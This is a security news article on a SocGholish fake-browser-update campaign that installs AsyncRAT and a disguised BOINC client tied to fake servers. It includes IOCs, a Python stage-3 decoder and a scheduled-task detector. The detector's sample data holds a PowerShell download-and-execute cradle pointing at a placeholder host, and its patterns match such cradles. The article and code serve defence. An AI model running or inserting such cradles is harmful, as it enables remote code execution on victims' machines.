Fake Browser Updates Installing Dangerous BOINC Malware

Researchers identified a new variant of SocGholish malware (aka FakeUpdates) that has been active since July 4th, 2024. The infection chain remains similar: users visiting compromised websites are tricked into downloading fake browser updates that install additional malware. 

The variant exhibits new behaviors compared to previous SocGholish campaigns. After the initial download, additional scripts are executed that deviate from the typical installation of Remote Access Trojans (RATs), like AsyncRAT or NetSupport RAT. 

The SocGholish infection starts with a malicious JavaScript download of the next stage payload, which bypasses AMSI security and uses a Domain Generation Algorithm (DGA) to create a random subdomain on rzegzwre.top. 

Infection Chain

It then retrieves the next stage from the constructed URL via an HTTP GET request using a WebClient object and executes the downloaded content directly in memory with Invoke-Expression.

A multi-stage process is used to download and execute the final AsyncRAT payload: stage 2 decodes, decrypts, and decompresses the obfuscated stage 3 by undoing its Base64 encoding, XOR encryption, and Gzip compression.
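The following is an added Python example, not code from the report or from any analyst tooling it describes; it shows how an analyst unwinds the three layers named above (Base64, then XOR with a repeating key, then Gzip) and how the fixed gzip header can be used to recover the first bytes of an unknown XOR key. The sample script and key are constructed for illustration.

```python
import base64
import gzip
from itertools import cycle

GZIP_MAGIC = b"\x1f\x8b\x08"  # every gzip stream starts with these three bytes


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key`. XOR is symmetric, so this both encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decode_stage3(blob: str, key: bytes) -> str:
    """Undo the layers in the order the text describes: Base64 -> XOR -> Gzip."""
    raw = base64.b64decode(blob)
    plain = xor_bytes(raw, key)
    if not plain.startswith(GZIP_MAGIC):
        raise ValueError("XOR output is not a gzip stream; wrong key?")
    return gzip.decompress(plain).decode("utf-8")


def key_prefix_from_gzip_header(blob: str) -> bytes:
    """Known-plaintext trick for an unknown key: the XOR layer must decrypt to a gzip
    stream, so XORing the first three ciphertext bytes with the gzip magic yields the
    first three key bytes. Longer keys still need the remaining bytes recovered."""
    raw = base64.b64decode(blob)
    return xor_bytes(raw[:3], GZIP_MAGIC)


def wrap_stage3(script: str, key: bytes) -> str:
    """Build a constructed test blob (gzip -> XOR -> Base64), the reverse of decode_stage3.
    Only used here to produce sample input; mtime=0 keeps the output deterministic."""
    packed = gzip.compress(script.encode("utf-8"), mtime=0)
    return base64.b64encode(xor_bytes(packed, key)).decode("ascii")


# Constructed sample: a harmless one-liner and an arbitrary key (not values from the report).
SAMPLE_KEY = b"k3y!"
SAMPLE_SCRIPT = "Write-Host 'stage 3 placeholder'"
SAMPLE_BLOB = wrap_stage3(SAMPLE_SCRIPT, SAMPLE_KEY)

if __name__ == "__main__":
    print("recovered key prefix:", key_prefix_from_gzip_header(SAMPLE_BLOB))
    print("decoded stage 3     :", decode_stage3(SAMPLE_BLOB, SAMPLE_KEY))
```

In a real triage the XOR key is usually visible in the stage 2 script itself; the header trick is for the case where only the blob was captured and confirms that a candidate key is correct before the gzip layer is touched.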

Validin visualization of C2 infrastructure over time.

Stage 3 checks for signs of a virtual machine environment by looking for specific hardware configurations and assigning a score based on the findings. It also generates a random domain name with a Domain Generation Algorithm (DGA), which is used in a cURL request to download the final payload.

CyberChef recipe to decode the obfuscated AsyncRAT PowerShell commands.

A malicious PowerShell script disguised as a BOINC software installation uses curl to download a file and then creates a directory and executable with random names. 

It removes evidence of the download, retrieves a ZIP archive containing a renamed BOINC.exe, creates a scheduled task to execute the renamed executable, and sets a registry value as a potential infection marker.

Malicious actors are exploiting the legitimate scientific computing platform BOINC to potentially establish command and control channels on victim machines by delivering BOINC through malware droppers and configuring it to connect to fake BOINC servers (rosettahome.top, rosettahome.cn) instead of legitimate ones. 

Hosts connected to the second malicious BOINC server observed

The BOINC client is disguised with names like trustedinstaller.exe to evade detection. While no malicious tasks have been observed yet, the ability to deliver tasks and potentially additional malware makes infected machines vulnerable to further attacks. 

It was found that an AsyncRAT infection was spreading through scheduled tasks, such as “Get-PhysicalExtentAssociation_QoS”, which looked like a maintenance task but was actually downloading encrypted PowerShell code from a C2 server.

According to Huntress, another task named “CleanUpMgrTask_1322139014” is associated with a BOINC client, possibly hiding malicious activity. 

There are several other scheduled tasks with generic names potentially related to SocGholish malware, which also uses fake browser updates as an initial access method, suggesting a combination of AsyncRAT and SocGholish techniques employed by the attacker. 
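The following is an added Python example, not code from the report or from Huntress; it turns the indicators above into a small host-side check. It flags scheduled tasks whose name matches the reported task names, whose action is a PowerShell download-and-execute cradle, or whose executable borrows a Windows system binary name (such as trustedinstaller.exe, which genuinely lives under C:\Windows\servicing) from a non-system path, and it checks BOINC project URLs against the fake servers named in the article. The task records and project list are constructed samples shaped like schtasks output, and the legitimate-host allowlist is an assumption to be extended per environment.

```python
import re
from pathlib import PureWindowsPath
from urllib.parse import urlparse

# Indicators taken from the reporting above.
SUSPICIOUS_TASK_NAMES = {"Get-PhysicalExtentAssociation_QoS", "CleanUpMgrTask_1322139014"}
FAKE_BOINC_HOSTS = {"rosettahome.top", "rosettahome.cn"}
# Assumed allowlist of legitimate BOINC project hosts; extend for your environment.
LEGIT_BOINC_HOSTS = {"boinc.bakerlab.org"}
# System binary names the dropper reuses, mapped to the directory the genuine file lives in.
SYSTEM_BINARY_HOMES = {"trustedinstaller.exe": "c:\\windows\\servicing"}

# Typical download-and-execute cradle fragments seen in malicious PowerShell task actions.
CRADLE_RE = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|net\.webclient|"
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden)",
    re.I,
)


def check_task(task: dict) -> list[str]:
    """Return a list of reasons a scheduled task record looks suspicious (empty if clean)."""
    hits = []
    name, action, args = task["name"], task["action"], task.get("args", "")
    if name in SUSPICIOUS_TASK_NAMES:
        hits.append(f"known SocGholish/AsyncRAT task name: {name}")
    exe = PureWindowsPath(action).name.lower()
    if exe in ("powershell.exe", "pwsh.exe") and CRADLE_RE.search(args):
        hits.append("PowerShell download/execute cradle in task action")
    home = SYSTEM_BINARY_HOMES.get(exe)
    if home and not action.lower().startswith(home):
        hits.append(f"{exe} outside {home}: likely renamed BOINC client")
    return hits


def check_boinc_projects(project_urls) -> list[str]:
    """Flag BOINC project URLs pointing at the reported fake servers or off the allowlist."""
    hits = []
    for url in project_urls:
        host = (urlparse(url).hostname or "").lower()
        if host in FAKE_BOINC_HOSTS:
            hits.append(f"BOINC project points at known fake server {host}")
        elif host not in LEGIT_BOINC_HOSTS:
            hits.append(f"BOINC project host not on allowlist: {host}")
    return hits


# Constructed sample records (not real telemetry), shaped like schtasks /query output.
SAMPLE_TASKS = [
    {"name": "Get-PhysicalExtentAssociation_QoS",
     "action": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "args": "-w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')\""},
    {"name": "CleanUpMgrTask_1322139014",
     "action": r"C:\ProgramData\xk9q\trustedinstaller.exe",
     "args": r"--dir C:\ProgramData\xk9q"},
    {"name": "MicrosoftEdgeUpdateTaskMachineUA",
     "action": r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe",
     "args": "/ua /installsource scheduler"},
]
SAMPLE_PROJECTS = ["https://boinc.bakerlab.org/rosetta/", "http://rosettahome.top/rosetta/"]


def scan(tasks=SAMPLE_TASKS, projects=SAMPLE_PROJECTS) -> dict[str, list[str]]:
    """Run both checks and return findings keyed by task name (plus 'boinc_projects')."""
    findings = {t["name"]: hits for t in tasks if (hits := check_task(t))}
    boinc = check_boinc_projects(projects)
    if boinc:
        findings["boinc_projects"] = boinc
    return findings


if __name__ == "__main__":
    for key, reasons in scan().items():
        print(key)
        for reason in reasons:
            print("  -", reason)
```

On a live host the task records would come from `schtasks /query /fo CSV /v` or the Task Scheduler event log, and the project URLs from the BOINC client's data directory; the rules are deliberately narrow so that legitimate maintenance tasks such as the Edge updater in the sample are not flagged.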

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.
